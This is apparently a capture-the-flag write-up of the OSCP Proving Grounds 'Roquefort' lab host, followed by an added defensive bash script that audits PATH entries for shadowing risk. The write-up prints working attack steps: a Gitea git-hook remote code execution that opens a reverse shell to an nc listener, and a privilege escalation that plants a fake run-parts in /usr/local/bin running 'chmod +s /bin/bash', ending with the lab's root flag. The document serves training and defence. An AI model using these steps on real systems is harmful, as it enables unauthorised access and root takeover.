
OSCP - Proving Grounds - Roquefort

Key takeaways

  • Git hook injection
  • Linux PATH shadowing

Steps

As usual, start with an nmap scan. Port 3000 was not familiar, so take a look at it first.

Nmap scan report for 192.168.54.67
Host is up (0.00083s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT     STATE  SERVICE VERSION
21/tcp   open   ftp     ProFTPD 1.3.5b
22/tcp   open   ssh     OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey: 
|   2048 aa:77:6f:b1:ed:65:b5:ad:14:64:40:d2:24:d3:9c:0d (RSA)
|   256 a9:b4:4f:61:2e:2d:9d:4c:48:15:fe:70:8e:fa:af:b3 (ECDSA)
|_  256 92:56:eb:af:c9:34:af:ea:a1:cf:9f:e1:90:dd:2f:61 (ED25519)
53/tcp   closed domain
2222/tcp open   ssh     Dropbear sshd 2016.74 (protocol 2.0)
3000/tcp open   ppp?

It turns out to be Gitea, version 1.7.5.

A search turns up https://github.com/p0dalirius/CVE-2020-14144-GiTea-git-hooks-rce; a quick read shows it abuses git hooks to execute system commands and spawn a reverse shell.

Trying weak passwords against http://192.168.156.67:3000/ fails, so register a new user instead, create a new project, and then try to modify its git hook.

After saving the hook, clone the project locally, make a change and push it; the reverse shell comes back.

C:\home\kali\Documents\OFFSEC\GoToWork\Roquefort\Test> vi test.txt

C:\home\kali\Documents\OFFSEC\GoToWork\Roquefort\Test> git add *

C:\home\kali\Documents\OFFSEC\GoToWork\Roquefort\Test> git commit -m "test1"
[master 9925c74] test1
 1 file changed, 1 insertion(+), 1 deletion(-)

C:\home\kali\Documents\OFFSEC\GoToWork\Roquefort\Test> git push origin master
Username for 'http://192.168.156.67:3000': timothy
Password for 'http://timothy@192.168.156.67:3000': 
remote: invalid credentials
fatal: Authentication failed for 'http://192.168.156.67:3000/timothy/Test/'

C:\home\kali\Documents\OFFSEC\GoToWork\Roquefort\Test> git push origin master
Username for 'http://192.168.156.67:3000': timothy
Password for 'http://timothy@192.168.156.67:3000': 
Enumerating objects: 5, done.
Counting objects: 100% (5/5), done.
Delta compression using up to 4 threads
Compressing objects: 100% (2/2), done.
Writing objects: 100% (3/3), 266 bytes | 266.00 KiB/s, done.
Total 3 (delta 0), reused 0 (delta 0), pack-reused 0 (from 0)

C:\home\kali\Documents\OFFSEC\GoToWork\Roquefort> nc -nlvp 2222
listening on [any] 2222 ...
connect to [192.168.45.234] from (UNKNOWN) [192.168.156.67] 48668
bash: cannot set terminal process group (753): Inappropriate ioctl for device
bash: no job control in this shell
chloe@roquefort:~/gitea-repositories/timothy/test.git$ whoami
whoami
chloe

sudo is not available and the SUID binaries show nothing useful. Uploading linpeas.sh reveals that this user has write permission on /usr/local/bin, so it may be possible to shadow a command that lives later in the PATH and escalate privileges (Linux searches the PATH directories from left to right when locating an executable).

......
......
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
......
......

Running pspy64 next shows that run-parts is executed periodically, so we can try to shadow run-parts.

./pspy64
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855



Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2024/10/27 19:34:31 CMD: UID=0    PID=92     | 
2024/10/27 19:34:31 CMD: UID=0    PID=9      | 
......
......
2024/10/27 19:35:01 CMD: UID=0    PID=14147  | /bin/sh -c    cd / && run-parts --report /etc/cron.hourly 
......
......

/bin comes after /usr/local/bin in the PATH, so the copy in /usr/local/bin is found first and the privilege escalation succeeds.

chloe@roquefort:~$ whereis run-parts
whereis run-parts
run-parts: /bin/run-parts /usr/share/man/man8/run-parts.8.gz
chloe@roquefort:~$ cd /usr/local/bin
lscd /usr/local/bin -l
chloe@roquefort:/usr/local/bin$ 
ls -l
total 63772
-rwxr-xr-x 1 root staff 65299840 Mar  6  2020 gitea
chloe@roquefort:/usr/local/bin$ echo "chmod +s /bin/bash" > run-parts
echo "chmod +s /bin/bash" > run-parts
chloe@roquefort:/usr/local/bin$ chmod +x run-parts
chmod +x run-partsl
chloe@roquefort:/usr/local/bin$ s -l
chloe@roquefort:/usr/local/bin$ ls -l /bin/bash
ls -l /bin/bash
-rwsr-sr-x 1 root root 1099016 May 15  2017 /bin/bash
chloe@roquefort:/usr/local/bin$ /bin/bash -p
/bin/bash -p
id
uid=1000(chloe) gid=1000(chloe) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),1000(chloe)
cat /root/proof.txt
203a640d81971f425ddb028950a9c595
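The condition exploited above (a PATH entry writable by an unprivileged user that is searched before the directory holding the real run-parts) can be audited with the script below. It is an added example, not code from the writeup; the function names are my own, and it runs against a constructed temp-dir layout that only mimics the target's /usr/local/bin and /bin.

```shell
#!/bin/bash
# Added audit helper for the PATH-shadowing condition above (not from the writeup).
# Given a PATH string and a command name it prints the directory that actually
# serves the command and the caller-writable PATH entries searched before it.
# The demo tree is constructed in a temp dir, mimicking /usr/local/bin and /bin.

# resolve_first PATH CMD: print the first PATH directory holding an executable CMD
resolve_first() {
    local IFS=':' d
    for d in $1; do
        [ -n "$d" ] || d=.                 # an empty entry means the current dir
        if [ -f "$d/$2" ] && [ -x "$d/$2" ]; then
            printf '%s\n' "$d"
            return 0
        fi
    done
    return 1
}

# writable_before PATH CMD: print every PATH directory the caller can write to that
# is searched no later than the one resolve_first picks; status 1 if there is none
writable_before() {
    local IFS=':' d target found=0
    target=$(resolve_first "$1" "$2") || target=''
    for d in $1; do
        [ -n "$d" ] || d=.
        if [ -d "$d" ] && [ -w "$d" ]; then
            printf '%s\n' "$d"
            found=1
        fi
        [ "$d" = "$target" ] && break
    done
    [ "$found" -eq 1 ]
}

# demo_tree: build the constructed sample layout and print its root
demo_tree() {
    local root
    root=$(mktemp -d)
    mkdir -p "$root/usr/local/bin" "$root/bin"
    printf '#!/bin/sh\necho real run-parts\n' > "$root/bin/run-parts"
    chmod 755 "$root/bin/run-parts"
    chmod 555 "$root/bin"                  # like root-owned /bin: not writable
    printf '%s\n' "$root"
}

root=$(demo_tree)
demo_path="$root/usr/local/bin:$root/bin"  # same order as the target's PATH
echo "run-parts resolves from: $(resolve_first "$demo_path" run-parts)"
echo "writable entries searched first:"; writable_before "$demo_path" run-parts
```

On a real host, run writable_before with the PATH that cron hands to /bin/sh (the one pspy showed) rather than your interactive shell's PATH, since that is the lookup that matters.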

http://www.kler.cn/a/531500.html
